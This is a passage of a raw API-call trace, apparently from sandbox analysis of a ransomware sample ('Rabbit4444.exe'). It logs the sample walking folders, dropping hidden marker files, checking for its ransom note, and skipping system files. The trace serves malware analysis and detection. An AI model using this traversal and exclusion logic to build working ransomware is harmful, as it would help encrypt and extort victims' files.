returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\" [0065.057] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0065.057] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.061] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.064] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.064] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.064] CloseHandle (hObject=0x2a0) returned 1 [0065.065] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy") returned 94 [0065.065] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.065] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702a7000, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf018efbd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0065.065] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.065] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.065] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.065] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.065] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702a7000, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf018efbd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.065] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.065] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.065] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.065] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.065] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.065] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf018efbd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf018efbd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf01b523f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.065] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.065] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.065] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x702a7000, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x702cd265, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.066] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0065.066] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0065.066] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0065.066] lstrcpyW (in: lpString1=0x130ebf6, lpString2="AC" | out: lpString1="AC") returned="AC" [0065.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0065.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116520 [0065.066] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x11d108 [0065.066] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7025ab41, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0065.066] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0065.066] lstrcpyW (in: lpString1=0x130ebf6, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0065.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0065.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108760 [0065.066] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122068 [0065.066] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7025ab41, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0065.066] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0065.067] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0065.067] lstrcpyW (in: lpString1=0x130ebf6, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0065.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0065.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11bb28 [0065.067] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x122108 [0065.067] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7025ab41, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0065.067] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0065.067] lstrcpyW (in: lpString1=0x130ebf6, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0065.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0065.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11b7a8 [0065.067] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x122188 [0065.067] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7025ab41, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0065.067] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.067] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.067] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0065.068] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0065.068] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0065.068] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0065.068] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0065.068] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0065.068] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0065.068] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0065.068] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0065.068] lstrcpyW (in: lpString1=0x130ebf6, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0065.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0065.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd8) returned 0x11b508 [0065.068] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221c8 | out: ListHead=0xf68b0, ListEntry=0x1221c8) returned 0x122088 [0065.068] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x70280da4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0065.068] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0065.068] lstrcpyW (in: lpString1=0x130ebf6, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0065.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0065.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108688 [0065.068] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x1221c8 [0065.068] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7025ab41, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0065.068] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.068] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.068] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0065.068] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0065.069] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0065.069] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0065.069] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0065.069] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0065.069] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0065.069] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0065.069] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0065.069] lstrcpyW (in: lpString1=0x130ebf6, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0065.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0065.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xda) returned 0x125488 [0065.069] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122008 [0065.069] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7025ab41, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0065.069] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0065.069] lstrcpyW (in: lpString1=0x130ebf6, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0065.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0065.069] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11b888 [0065.069] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x121fe8 [0065.069] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7025ab41, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0065.069] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0065.069] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.070] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.070] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.070] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.070] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.071] CloseHandle (hObject=0x2cc) returned 1 [0065.071] CloseHandle (hObject=0x2a0) returned 1 [0065.071] GetCurrentThreadId () returned 0xd98 [0065.071] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0065.071] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState" [0065.071] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b888 | out: hHeap=0xe0000) returned 1 [0065.071] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0065.071] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState" [0065.071] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\" [0065.071] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0065.071] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.073] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.076] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.076] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.077] CloseHandle (hObject=0x2a0) returned 1 [0065.077] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState") returned 104 [0065.077] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.077] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf01b523f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0065.077] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.077] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.077] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.077] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.077] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7025ab41, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf01b523f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.077] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.077] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 